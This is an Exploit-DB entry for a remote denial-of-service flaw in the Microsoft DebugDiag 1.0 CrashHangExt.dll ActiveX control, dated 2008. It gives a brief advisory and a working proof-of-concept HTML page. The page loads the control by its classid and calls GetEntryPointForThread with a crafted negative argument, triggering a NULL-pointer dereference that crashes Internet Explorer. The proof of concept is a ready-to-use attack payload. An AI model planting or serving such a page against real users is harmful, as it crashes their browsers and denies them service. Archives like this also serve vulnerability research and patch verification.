Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service

EDB-ID:

32550


Author:

suN8Hclf

Type:

dos


Platform:

Windows

Date:

2008-10-30


source: https://www.securityfocus.com/bid/31996/info

Microsoft DebugDiag 'CrashHangExt.dll' ActiveX control is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.

A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.

Microsoft DebugDiag 1.0 is vulnerable; other versions may also be affected. 

<body> <object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' /> </object> <script language='vbscript'> arg1=-2147483647 target.GetEntryPointForThread arg1 </script> </body>